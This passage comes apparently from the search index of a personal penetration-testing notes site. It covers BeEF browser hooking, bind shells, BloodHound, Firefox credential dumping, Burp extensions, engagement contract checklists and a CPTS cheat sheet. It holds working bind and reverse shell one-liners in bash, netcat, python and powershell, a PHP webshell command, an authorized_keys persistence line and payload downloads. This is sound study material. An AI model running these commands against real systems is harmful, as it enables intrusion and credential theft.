                        git clone https://github.com/beefproject/beef`\n
                        ","tags":["web pentesting","phishing","tools"]},{"location":"beef/#usage","title":"Usage","text":"

                        Basically it allows you to create a hook in the persistent or storage script injection. BeEF provides a pannel to see the connections to your hook. If eventually admin connect to the website, you may gain permission to the server.

                        ","tags":["web pentesting","phishing","tools"]},{"location":"beef/#basic-commands","title":"Basic commands","text":"
                        Social engineering \nOpen webcams \nAlert messages\nRun javascript\nGet screenshots of what the person has on their screen\nRedirect Browser\nCreate Fake authentication dialog box (facebooks...)\n.......\n
                        ","tags":["web pentesting","phishing","tools"]},{"location":"beef/#attacks","title":"Attacks","text":"","tags":["web pentesting","phishing","tools"]},{"location":"beef/#tunneling-proxy","title":"Tunneling proxy","text":"

                        See XSS attacks.

                        An alternative to stealing protected cookies is to use the victim browser as a proxy. The Tunneling Proxy in BeEF exploits the XSS flaw and uses the victim browser to perform requests as the victim user to the web application. Basically, it tunnels requests through the hooked browser. By doing so, there is no way for the web application to distinguish between requests coming from legitimate user and requests forged by an atacker. BeEF allows you to bypass other web developer protection techniques such as using multiple validations (User-agent, custom headers,...)

                        ","tags":["web pentesting","phishing","tools"]},{"location":"beef/#event-logger","title":"Event logger","text":"

                        The event logger allows us to capture keystrokes, acting as a keylogger.

                        ","tags":["web pentesting","phishing","tools"]},{"location":"bind-shells/","title":"Bind shells","text":"All about shells Shell Type Description Reverse shell Initiates a connection back to a \"listener\" on our attack box. Bind shell \"Binds\" to a specific port on the target host and waits for a connection from our attack box. Web shell Runs operating system commands via the web browser, typically not interactive or semi-interactive. It can also be used to run single commands (i.e., leveraging a file upload vulnerability and uploading a\u00a0PHP\u00a0script to run a single command.

                        In a bind-shell the attacking machine initiates a connection to a listener port on the victim's machine.

                        First step in this attack is initiating the listening connection on port '1234' on the remote host (the victim's), with IP '0.0.0.0' so that we can connect to it from anywhere.

                        ","tags":["pentesting","web pentesting","bind shells"]},{"location":"bind-shells/#bind-shell-connections","title":"Bind shell connections","text":"","tags":["pentesting","web pentesting","bind shells"]},{"location":"bind-shells/#bash","title":"bash","text":"
                        rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f\n
                        ","tags":["pentesting","web pentesting","bind shells"]},{"location":"bind-shells/#netcat","title":"netcat","text":"
                        nc -lvp 1234 -e /bin/bash\n
                        ","tags":["pentesting","web pentesting","bind shells"]},{"location":"bind-shells/#python","title":"python","text":"
                        python -c 'exec(\"\"\"import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind((\"0.0.0.0\",1234));s1.listen(1);c,a=s1.accept();\\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())\"\"\")'\n
                        ","tags":["pentesting","web pentesting","bind shells"]},{"location":"bind-shells/#powershell","title":"powershell","text":"
                        powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \" \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();\n

                        Second step: If we have succeeded in previous step, we have a shell waiting for us on the specified port (1234) in the victim's machine. Now, let's connect to it from our attacking machine:

                        shell-session nc 10.10.10.1 1234 # 10.10.10.1 would be the victim's machine # 1234 would be the listening port on victim's machine

                        Unlike a Reverse Shell, if we drop our connection to a bind shell for any reason, we can connect back to it and get another connection immediately. However, if the bind shell command is stopped for any reason, or if the remote host is rebooted, we would still lose our access to the remote host and will have to exploit it again to gain access.

                        ","tags":["pentesting","web pentesting","bind shells"]},{"location":"bind-shells/#some-more-resources","title":"Some more resources","text":"Reverse shell Link to resource PayloadsAllTheThings https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Bind%20Shell%20Cheatsheet.md)","tags":["pentesting","web pentesting","bind shells"]},{"location":"bloodhound/","title":"BloodHound","text":"

                        (C# and PowerShell Collectors)

                        ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"bloodhound/#installation","title":"Installation","text":"

                        BloodHound is a single page Javascript web application, built on top of\u00a0Linkurious, compiled with\u00a0Electron, with a\u00a0Neo4j\u00a0database fed by a C# data collector.

                        Download github repo from: https://github.com/BloodHoundAD/BloodHound.

                        Sharphound is the official data collector for BloodHound.

                        sudo apt-get install bloodhound\n

                        Initialize the console:

                        sudo neo4j console \n

                        Open the browser at the indicated address: http://localhost:7474/

                        The first time it will ask you for default user and password: neo4j:neo4j.

                        After loging into the application you will be prompted to change default password.

                        ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"bloodhound/#basic-usage","title":"Basic usage","text":"

                        1. Get SharpHound collector working in the victim's machine:

                        # Same as with powerview\npowershell -ep bypass\n\n# Launch Sharphound\n..\\Downloads\\SharpHound.ps1\n\n# Generate a zip file\nInvoke-BloodHound -CollectionMethod All -Domain CONTROLER.local -ZipFileName loot.zip\n

                        2. Transfer loot.zip file to you attacker machine

                        3. Import loot.zip into Bloodhoud.

                        # Launch Bloodhound interface.\nbloodhound\n# enter user:password already set before for the neo4j console.\n

                        Click on \"Upload data\". Upload the file.

                        ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"braa/","title":"braa - SNMP scanner","text":"","tags":["enumeration","snmp","port 161","tools"]},{"location":"braa/#installation","title":"Installation","text":"

                        Download from the github repo: https://github.com/mteg/braa

                        Also:

                        sudo apt install braa\n
                        ","tags":["enumeration","snmp","port 161","tools"]},{"location":"braa/#basic-usage","title":"Basic usage","text":"
                        braa <community string>@$ip:.1.3.6.*   \n\n    # Example:\n    # braa public@10.129.14.128:.1.3.6.*\n
                        ","tags":["enumeration","snmp","port 161","tools"]},{"location":"browsers-pentesting/","title":"Pentesting Browsers","text":"","tags":["pentesting","browsers","chrome","firefox","tools"]},{"location":"browsers-pentesting/#dumping-memory-and-cache","title":"Dumping memory and cache","text":"

                        mimipenguin lazagne

                        Firefox stored credentials:

                        ls -l .mozilla/firefox/ | grep default \n\ncat .mozilla/firefox/xxxxxxxxx-xxxxxxxxxx/logins.json | jq .\n

                        The tool Firefox Decrypt is excellent for decrypting these credentials, and is updated regularly. It requires Python 3.9 to run the latest version. Otherwise, Firefox Decrypt 0.7.0 with Python 2 must be used.

                        ","tags":["pentesting","browsers","chrome","firefox","tools"]},{"location":"burpsuite/","title":"Burpsuite","text":"

                        Burp Suite is a Man-in-the-middle (MITM) proxy loaded with valuable tools to help pentesters.

                        Related issues:

                        Setting up Postman with BurpSuite

                        Burp Suite has two editions:

                        • Community Edition - Provides you with everything you need to get started and is designed for students or professionals looking to learn more about AppSec. Features include: \u25a0 HTTP(s) Proxy. \u25a0 Modules - Repeater, Decoder, Sequencer & Comparer. \u25a0 Lite version of the Intruder module (Performance Throttling).
                        • Professional Edition - Faster, more reliable offering designed for penetration testers and security professionals. Features include everything in the community edition plus: \u25a0 Project files. \u25a0 No performance throttling. \u25a0 Intruder - Fully featured module. \u25a0 Custom PortSwigger payloads. \u25a0 Automatic scanner and crawler.

                        Accessing older releases: https://portswigger.net/burp/releases/archive.

                        ","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#runtime-environments","title":"Runtime environments","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#jython-python-environment","title":"Jython: python environment","text":"

                        Download from: https://www.jython.org/download.html

                        ","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#jruby-ruby-environment","title":"JRuby: ruby environment","text":"

                        Download from: https://www.jruby.org/download

                        ","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#extensions-that-make-your-life-better","title":"Extensions that make your life better","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#autorize","title":"Autorize","text":"

                        Autorize is an extension aimed at helping the penetration tester to detect authorization vulnerabilities, one of the more time-consuming tasks in a web application penetration test.

                        It is sufficient to give to the extension the cookies of a low privileged user and navigate the website with a high privileged user. The extension automatically repeats every request with the session of the low privileged user and detects authorization vulnerabilities.

                        It is also possible to repeat every request without any cookies in order to detect authentication vulnerabilities in addition to authorization ones.

                        The plugin works without any configuration, but is also highly customizable, allowing configuration of the granularity of the authorization enforcement conditions and also which requests the plugin must test and which not. It is possible to save the state of the plugin and to export a report of the authorization tests in HTML or in CSV.

                        The reported enforcement statuses are the following:

                        1. Bypassed! - Red color
                        2. Enforced! - Green color
                        3. Is enforced??? (please configure enforcement detector) - Yellow color
                        ","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#param-miner","title":"Param Miner","text":"

                        In Burp Suite, you can use the Param Miner extension's \"Guess headers\" function to automatically probe for supported headers using its extensive built-in wordlist.

                        ","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#turbo-intruder","title":"Turbo intruder","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#cms-scanner","title":"CMS Scanner","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#waf-detect","title":"WAF Detect","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#bypass-waf","title":"Bypass WAF","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#waf-cookie-fetcher","title":"Waf Cookie Fetcher","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#pdf-viewer","title":"PDF Viewer","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#wayback-machine","title":"Wayback machine","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#software-vulnerability-scanner","title":"Software Vulnerability Scanner","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#php-object-injection-slinger","title":"PHP Object Injection Slinger","text":"

                        https://github.com/portswigger/poi-slinger

                        This is an extension for Burp Suite Professional, designed to help you scan for PHP Object Injection vulnerabilities on popular PHP Frameworks and some of their dependencies. It will send a serialized PHP Object to the web application designed to force the web server to perform a DNS lookup to a Burp Collaborator Callback Host.

                        The payloads for this extension are all from the excellent Ambionics project PHPGGC. PHPGGC is a library of PHP unserialize() payloads along with a tool to generate them, from command line or programmatically. You will need it for further exploiting any vulnerabilities found by this extension.

                        You should combine your testing with the PHP Object Injection Check extension from Securify so you can identify other possible PHP Object Injection issues that this extension does not pick up.

                        To use the extension, on the Proxy/Target/Intruder/Repeater Tab, right click on the desired HTTP Request and click Send To POI Slinger. This will also highlight the HTTP Request and set the comment Sent to POI Slinger You can watch the debug messages on the extension's output pane under Extender->Extensions->PHP Object Injection Slinger.

                        ","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#jwt-editor","title":"JWT Editor","text":"

                        https://github.com/portswigger/jwt-editor

                        JWT Editor is a Burp Suite extension for editing, signing, verifying, encrypting and decrypting JSON Web Tokens (JWTs).

                        It provides automatic detection and in-line editing of JWTs within HTTP requests/responses and web socket messages, signing and encrypting of tokens and automation of several well-known attacks against JWT implementations.

                        It was written originally by Fraser Winterborn, formerly of BlackBerry Security Research Group. The original source code can be found here.

                        For further information, check out the repository here.

                        ","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#java-deserialization-scanner","title":"Java Deserialization Scanner","text":"

                        https://github.com/portswigger/java-deserialization-scanner

                        This extension gives Burp Suite the ability to find Java deserialization vulnerabilities.

                        It adds checks to both the active and passive scanner and can also be used in an \"Intruder like\" manual mode, with a dedicated tab.

                        The extension allows the user to discover and exploit Java Deserialization Vulnerabilities with different encodings (Raw, Base64, Ascii Hex, GZIP, Base64 GZIP) when the following libraries are loaded in the target JVM:

                        • Apache Commons Collections 3 (up to 3.2.1), with five different chains
                        • Apache Commons Collections 4 (up to 4.4.0), with two different chains
                        • Spring (up to 4.2.2)
                        • Java 6 and Java 7 (up to Jdk7u21) without any weak library
                        • Hibernate 5
                        • JSON
                        • Rome
                        • Java 8 (up to Jdk8u20) without any weak library
                        • Apache Commons BeanUtils
                        • Javassist/Weld
                        • JBoss Interceptors
                        • Mozilla Rhino (two different chains)
                        • Vaadin

                        Furthermore, URLSNDS payload has been introduced to actively detect Java deserialization on the backend without any vulnerable library. This check does the same job as the CPU attack vector already present in the \"Manual testing\" section but can be safely added to the Burp Suite Active Scanner engine, while the CPU payload should be use with caution.

                        After that a Java deserialization vulnerability has been found, a dedicated exploitation tab offers a comfortable interface to exploit deserialization vulnerabilities using frohoff ysoserial https://github.com/frohoff/ysoserial

                        Mini walkthrough: https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/

                        ","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"cewl/","title":"cewl - A custom dictionary generator","text":"","tags":["web pentesting","enumeration","dictionaries","tools"]},{"location":"cewl/#installation","title":"Installation","text":"

                        Preintalled in Kali Linux.

                        Github repo: https://github.com/digininja/CeWL.

                        ","tags":["web pentesting","enumeration","dictionaries","tools"]},{"location":"cewl/#basic-commands","title":"Basic commands","text":"
                        cewl -m 6 -d 3 --lowercase  URL\n# -d <x>,--depth <x>: Depth to spider to, default 2.\n# -m, --min_word_length: Minimum word length, default 3.\n# --lowercase: save as lowercase\n
                        ","tags":["web pentesting","enumeration","dictionaries","tools"]},{"location":"cewl/#examples-from-real-life","title":"Examples from real life","text":"
                        cewl domain/path-to-post -w outputfile.txt\n# -w output a list of words to a file.\n
                        ","tags":["web pentesting","enumeration","dictionaries","tools"]},{"location":"cff-explorer/","title":"CFF explorer","text":"

                        Created by Erik Pistelli, a freeware suite of tools including a PE editor called CFF Explorer and a process viewer. The PE editor has full support for PE32/64. Special fields description and modification (.NET supported), utilities, rebuilder, hex editor, import adder, signature scanner, signature manager, extension support, scripting, disassembler, dependency walker etc. First PE editor with support for .NET internal structures. Resource Editor (Windows Vista icons supported) capable of handling .NET manifest resources. The suite is available for x86 and x64.

                        ","tags":["windows","thick applications"]},{"location":"cff-explorer/#installation","title":"Installation","text":"

                        Download from Explorer Suite \u2013 NTCore.

                        ","tags":["windows","thick applications"]},{"location":"checksum/","title":"Checksum","text":"","tags":["file integrity","checksum"]},{"location":"checksum/#description","title":"Description","text":"

                        A checksum is a small-sized datum from a block of digital data for the purpose of detecting errors which may have been introduced during its transmission or storage.

                        Each checksum is generated by a checksum algorithm. Basically, it takes a file as input and outputs the checksum value of that file. There are various algorithms for generating checksums. Here is the name of some of them and the tool employed to generate them:

                        Algorithm Tool MD5 md5sum SHA-1 sha1sum SHA-256 sha256","tags":["file integrity","checksum"]},{"location":"checksum/#how-to-use-checksum-to-verify-file-integrity","title":"How to use checksum to verify file integrity","text":"

                        Go to the directory where the file is stored. Let's suppose we are using MD5 to checksum the file.

                        md5sum fileName\n

                        As a result, it prints out the MD5 (128-bit) checksum of the file. Usually, when downloading a file you are given a checksum to compare it with the one you can generate from the file. If there is a difference, no matter how minimum that is, then we can assume the downloaded file has been alterated.

                        ","tags":["file integrity","checksum"]},{"location":"cloning-a-site/","title":"Tools for cloning a site","text":"

                        BeEF.

                        Veil

                        URLCrazy: URLCrazy is an OSINT tool to generate and test domain typos or variations to detect or perform typo squatting, URL hijacking, phishing, and corporate espionage.

                        ","tags":["web pentesting","phishing","tools"]},{"location":"computer-forensic-fundamentals/","title":"Computer Forensic Fundamentals","text":"","tags":["forensic"]},{"location":"computer-forensic-fundamentals/#mbr","title":"MBR","text":"

                        The Master Boot Record (MBR) is\u00a0the information in the first sector of a hard disk or a removable drive. It identifies how and where the system's operating system (OS) is located in order to be booted (loaded) into the computer's main storage or random access memory (RAM).

                        ","tags":["forensic"]},{"location":"computer-forensic-fundamentals/#file-systems","title":"File systems","text":"

                        | Windows / floppy disls /USB sticks | FAT12, FAT 16/32, NTFS | | Linux most common | ext, Apple/MAC, HFS | | CDs most commons | ISO 9660, ISO 13490 | | DVDs most common | UDF, Joliet |

                        ","tags":["forensic"]},{"location":"computer-forensic-fundamentals/#usb-sticks","title":"USB sticks","text":"

                        Get serial number and manufacture information (useful in linking to an OS later).

                        First time USB device connected to system (registry key):

                        HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Enum\\USBSTOR\n

                        Last time USB device connected to system (registry key):

                        HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\DeviceClass\n
                        ","tags":["forensic"]},{"location":"computer-forensic-fundamentals/#ftk-imager-a-tool-for-forensic-analysis","title":"FTK imager - A tool for forensic analysis","text":"

                        What is it? A tool that quickly assess electronic evidence by obtaining forensic images of computer data, without making changes to the original evidence.

                        ","tags":["forensic"]},{"location":"configuration-files/","title":"Configuration files for some juicy services","text":"","tags":["pentesting","privilege escalation","linux"]},{"location":"configuration-files/#exposed-credentials","title":"Exposed Credentials","text":"

                        Look for files with read permission and see if they contain any exposed credentials. This is very common with configuration files, log files, and user history files (bash_history in Linux and PSReadLine in Windows).

                        /var/www/html/config.php\n
                        ","tags":["pentesting","privilege escalation","linux"]},{"location":"contract-checklist/","title":"Contract - Checklist","text":"Checkpoint Description \u2610 NDA Non-Disclosure Agreement (NDA) refers to a secrecy contract between the client and the contractor regarding all written or verbal information concerning an order/project. The contractor agrees to treat all confidential information brought to its attention as strictly confidential, even after the order/project is completed. Furthermore, any exceptions to confidentiality, the transferability of rights and obligations, and contractual penalties shall be stipulated in the agreement. The NDA should be signed before the kick-off meeting or at the latest during the meeting before any information is discussed in detail. \u2610 Goals Goals are milestones that must be achieved during the order/project. In this process, goal setting is started with the significant goals and continued with fine-grained and small ones. \u2610 Scope The individual components to be tested are discussed and defined. These may include domains, IP ranges, individual hosts, specific accounts, security systems, etc. Our customers may expect us to find out one or the other point by ourselves. However, the legal basis for testing the individual components has the highest priority here. \u2610 Penetration Testing Type When choosing the type of penetration test, we present the individual options and explain the advantages and disadvantages. Since we already know the goals and scope of our customers, we can and should also make a recommendation on what we advise and justify our recommendation accordingly. Which type is used in the end is the client's decision. \u2610 Methodologies Examples: OSSTMM, OWASP, automated and manual unauthenticated analysis of the internal and external network components, vulnerability assessments of network components and web applications, vulnerability threat vectorization, verification and exploitation, and exploit development to facilitate evasion techniques. \u2610 Penetration Testing Locations External: Remote (via secure VPN) and/or Internal: Internal or Remote (via secure VPN) \u2610 Time Estimation For the time estimation, we need the start and the end date for the penetration test. This gives us a precise time window to perform the test and helps us plan our procedure. It is also vital to explicitly ask how time windows the individual attacks (Exploitation / Post-Exploitation / Lateral Movement) are to be carried out. These can be carried out during or outside regular working hours. When testing outside regular working hours, the focus is more on the security solutions and systems that should withstand our attacks. \u2610 Third Parties For the third parties, it must be determined via which third-party providers our customer obtains services. These can be cloud providers, ISPs, and other hosting providers. Our client must obtain written consent from these providers describing that they agree and are aware that certain parts of their service will be subject to a simulated hacking attack. It is also highly advisable to require the contractor to forward the third-party permission sent to us so that we have actual confirmation that this permission has indeed been obtained. \u2610 Evasive Testing Evasive testing is the test of evading and passing security traffic and security systems in the customer's infrastructure. We look for techniques that allow us to find out information about the internal components and attack them. It depends on whether our contractor wants us to use such techniques or not. \u2610 Risks We must also inform our client about the risks involved in the tests and the possible consequences. Based on the risks and their potential severity, we can then set the limitations together and take certain precautions. \u2610 Scope Limitations & Restrictions It is also essential to determine which servers, workstations, or other network components are essential for the client's proper functioning and its customers. We will have to avoid these and must not influence them any further, as this could lead to critical technical errors that could also affect our client's customers in production. \u2610 Information Handling HIPAA, PCI, HITRUST, FISMA/NIST, etc. \u2610 Contact Information For the contact information, we need to create a list of each person's name, title, job title, e-mail address, phone number, office phone number, and an escalation priority order. \u2610 Lines of Communication It should also be documented which communication channels are used to exchange information between the customer and us. This may involve e-mail correspondence, telephone calls, or personal meetings. \u2610 Reporting Apart from the report's structure, any customer-specific requirements the report should contain are also discussed. In addition, we clarify how the reporting is to take place and whether a presentation of the results is desired. \u2610 Payment Terms Finally, prices and the terms of payment are explained.","tags":["information-gathering","rules","of","engagement","cpts"]},{"location":"contractor-agreement-checklist/","title":"Contractors Agreement - Checklist for Physical Assessments","text":"Checkpoint Contents \u2610 Introduction Description of this document. \u2610 Contractor Company name, contractor full name, job title. \u2610 Penetration Testers Company name, pentesters full name. \u2610 Contact Information Mailing addresses, e-mail addresses, and phone numbers of all client parties and penetration testers. \u2610 Purpose Description of the purpose for the conducted penetration test. \u2610 Goals Description of the goals that should be achieved with the penetration test. \u2610 Scope All IPs, domain names, URLs, or CIDR ranges. \u2610 Lines of Communication Online conferences or phone calls or face-to-face meetings, or via e-mail. \u2610 Time Estimation Start and end dates. \u2610 Time of the Day to Test Times of the day to test. \u2610 Penetration Testing Type External/Internal Penetration Test/Vulnerability Assessments/Social Engineering. \u2610 Penetration Testing Locations Description of how the connection to the client network is established. \u2610 Methodologies OSSTMM, PTES, OWASP, and others. \u2610 Objectives / Flags Users, specific files, specific information, and others. \u2610 Evidence Handling Encryption, secure protocols \u2610 System Backups Configuration files, databases, and others. \u2610 Information Handling Strong data encryption \u2610 Incident Handling and Reporting Cases for contact, pentest interruptions, type of reports \u2610 Status Meetings Frequency of meetings, dates, times, included parties \u2610 Reporting Type, target readers, focus \u2610 Retesting Start and end dates \u2610 Disclaimers and Limitation of Liability System damage, data loss \u2610 Permission to Test Signed contract, contractors agreement","tags":["information-gathering","rules","of","engagement","cpts"]},{"location":"cpts-index/","title":"CPTS","text":"Number Module My notes Duration 01 Penetration Testing Process Penetration Testing Process 6 hours Introduction 02 Network Enumeration with Nmap (Almost) all about nmap 7 hours Reconnaissance, Enumeration & Attack Planning 03 Footprinting Introduction to footprinting Infrastructure and web enumeration Some services: FTP, SMB, NFS, DNS, SMTP, IMAP/POP3,SNMP, MySQL, Oracle TNS, IPMI, SSH, RSYNC, R Services, RDP, WinRM, WMI 2 days Reconnaissance, Enumeration & Attack Planning 04 Information Gathering - Web Edition Information Gathering - Web Edition. With tools such as Gobuster, ffuf, Burpsuite, Wfuzz, feroxbuster 7 hours Reconnaissance, Enumeration & Attack Planning 05 Vulnerability Assessment Vulnerability Assessment: Nessus, Openvas 2 hours Reconnaissance, Enumeration & Attack Planning 06 File Transfer techniques File Transfer Techniques: Linux, Windows, Code- netcat python php and others, Bypassing file upload restrictions, File encryption, Evading techniques when transferring files, LOLbas Living off the land binaries 3 hours Reconnaissance, Enumeration & Attack Planning 07 Shells & Payloads Bind shells, Reverse shells, Spawn a shell, Web shells (Laudanum and nishang) 2 days Reconnaissance, Enumeration & Attack Planning 08 Using the Metasploit Framework Metasploit, Msfvenom 5 hours Reconnaissance, Enumeration & Attack Planning 09 Password Attacks Password attacks 8 hours Exploitation & Lateral Movement 10 Attacking Common Services Common services: FTP SMB (tools: smbclient, smbmap, rpcclient, Samba Suite, crackmapexec, impacket-smbexec, impacket-psexec), Databases (MySQL and Attacking MySQL, MSSQL and Atacking MSSQL, log4j, RDP, DNS, SMTP 8 hours Exploitation & Lateral Movement 11 Pivoting, Tunneling, and Port Forwarding 2 days Exploitation & Lateral Movement 12 Active Directory Enumeration & Attacks 7 days Exploitation & Lateral Movement 13 Using Web Proxies 8 hours Web Exploitation 14 Attacking Web Applications with Ffuf 5 hours Web Exploitation 15 Login Brute Forcing 6 hours Web Exploitation 16 SQL Injection Fundamentals 8 hours Web Exploitation 17 SQLMap Essentials 8 hours Web Exploitation 18 Cross-Site Scripting (XSS) 6 hours Web Exploitation 19 File Inclusion 8 hours Web Exploitation 20 File Upload Attacks 8 hours Web Exploitation 21 Command Injections 6 hours Web Exploitation 22 Web Attacks 2 days Web Exploitation 23 Attacking Common Applications 4 days Web Exploitation 24 Linux Privilege Escalation 8 hours Post-Exploitation 25 Windows Privilege Escalation 4 days Post-Exploitation 26 Documentation & Reporting 2 days Reporting & Capstone 27 Attacking Enterprise Networks 2 days Reporting & Capstone","tags":["CPTS"]},{"location":"cpts-index/#practicing-steps","title":"Practicing Steps","text":"

                        Starting point:

                        • 2x Modules: The modules chosen should be categorized according to\u00a0two different difficulties:\u00a0technical\u00a0and\u00a0offensive.
                        • 3x Retired Machines: we recommend choosing\u00a0two easy\u00a0and\u00a0one medium\u00a0machines. At the end of each module, you will find recommended retired machines to consider that will help you practice the specific tools and topics covered in the module. These hosts will share one or more attack vectors tied to the module.
                        • 5x Active Machines: After building a good foundation with the modules and the retired machines, we can venture to\u00a0two easy,\u00a0two medium, and\u00a0one hard\u00a0active machine. We can also take these from the corresponding module recommendations at the end of each module in Academy.
                        • 1x Pro Lab / Endgame: These labs are large multi-host environments that often simulate enterprise networks of varying sizes similar to those we could run into during actual penetration tests for our clients.
                        ","tags":["CPTS"]},{"location":"cpts-index/#generic-cheat-sheet","title":"Generic cheat sheet","text":"","tags":["CPTS"]},{"location":"cpts-index/#basic-tools","title":"Basic Tools","text":"Command Description General sudo openvpn user.ovpn Connect to VPN ifconfig/ip a Show our IP address netstat -rn Show networks accessible via the VPN ssh\u00a0user@10.10.10.10 SSH to a remote server ftp 10.129.42.253 FTP to a remote server tmux tmux Start tmux ctrl+b tmux: default prefix prefix c tmux: new window prefix 1 tmux: switch to window (1) prefix shift+% tmux: split pane vertically prefix shift+\" tmux: split pane horizontally prefix -> tmux: switch to the right pane Vim vim file vim: open\u00a0file\u00a0with vim esc+i vim: enter\u00a0insert\u00a0mode esc vim: back to\u00a0normal\u00a0mode x vim: Cut character dw vim: Cut word dd vim: Cut full line yw vim: Copy word yy vim: Copy full line p vim: Paste :1 vim: Go to line number 1. :w vim: Write the file 'i.e. save' :q vim: Quit :q! vim: Quit without saving :wq vim: Write and quit","tags":["CPTS"]},{"location":"cpts-index/#pentesting","title":"Pentesting","text":"Command Description Service Scanning nmap 10.129.42.253 Run nmap on an IP nmap -sV -sC -p- 10.129.42.253 Run an nmap script scan on an IP locate scripts/citrix List various available nmap scripts nmap --script smb-os-discovery.nse -p445 10.10.10.40 Run an nmap script on an IP netcat 10.10.10.10 22 Grab banner of an open port smbclient -N -L \\\\\\\\10.129.42.253 List SMB Shares smbclient \\\\\\\\10.129.42.253\\\\users Connect to an SMB share snmpwalk -v 2c -c public 10.129.42.253 1.3.6.1.2.1.1.5.0 Scan SNMP on an IP onesixtyone -c dict.txt 10.129.42.254 Brute force SNMP secret string Web Enumeration gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt Run a directory scan on a website gobuster dns -d inlanefreight.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt Run a sub-domain scan on a website curl -IL https://www.inlanefreight.com Grab website banner whatweb 10.10.10.121 List details about the webserver/certificates curl 10.10.10.121/robots.txt List potential directories in\u00a0robots.txt ctrl+U View page source (in Firefox) Public Exploits searchsploit openssh 7.2 Search for public exploits for a web application msfconsole MSF: Start the Metasploit Framework search exploit eternalblue MSF: Search for public exploits in MSF use exploit/windows/smb/ms17_010_psexec MSF: Start using an MSF module show options MSF: Show required options for an MSF module set RHOSTS 10.10.10.40 MSF: Set a value for an MSF module option check MSF: Test if the target server is vulnerable exploit MSF: Run the exploit on the target server is vulnerable Using Shells nc -lvnp 1234 Start a\u00a0nc\u00a0listener on a local port bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1' Send a reverse shell from the remote server rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\\|/bin/sh -i 2>&1\\|nc 10.10.10.10 1234 >/tmp/f Another command to send a reverse shell from the remote server rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\\|/bin/bash -i 2>&1\\|nc -lvp 1234 >/tmp/f Start a bind shell on the remote server nc 10.10.10.1 1234 Connect to a bind shell started on the remote server python -c 'import pty; pty.spawn(\"/bin/bash\")' Upgrade shell TTY (1) ctrl+z\u00a0then\u00a0stty raw -echo\u00a0then\u00a0fg\u00a0then\u00a0enter\u00a0twice Upgrade shell TTY (2) echo \"<?php system(\\$_GET['cmd']);?>\" > /var/www/html/shell.php Create a webshell php file curl http://SERVER_IP:PORT/shell.php?cmd=id Execute a command on an uploaded webshell Privilege Escalation ./linpeas.sh Run\u00a0linpeas\u00a0script to enumerate remote server sudo -l List available\u00a0sudo\u00a0privileges sudo -u user /bin/echo Hello World! Run a command with\u00a0sudo sudo su - Switch to root user (if we have access to\u00a0sudo su) sudo su user - Switch to a user (if we have access to\u00a0sudo su) ssh-keygen -f key Create a new SSH key echo \"ssh-rsa AAAAB...SNIP...M= user@parrot\" >> /root/.ssh/authorized_keys Add the generated public key to the user ssh\u00a0root@10.10.10.10\u00a0-i key SSH to the server with the generated private key Transferring Files python3 -m http.server 8000 Start a local webserver wget http://10.10.14.1:8000/linpeas.sh Download a file on the remote server from our local machine curl http://10.10.14.1:8000/linenum.sh -o linenum.sh Download a file on the remote server from our local machine scp linenum.sh user@remotehost:/tmp/linenum.sh Transfer a file to the remote server with\u00a0scp\u00a0(requires SSH access) base64 shell -w 0 Convert a file to\u00a0base64 echo f0VMR...SNIO...InmDwU \\| base64 -d > shell Convert a file from\u00a0base64\u00a0back to its orig md5sum shell Check the file's\u00a0md5sum\u00a0to ensure it converted correctly","tags":["CPTS"]},{"location":"cpts-labs/","title":"Lab resolution","text":""},{"location":"cpts-labs/#service-scanning","title":"Service scanning","text":"

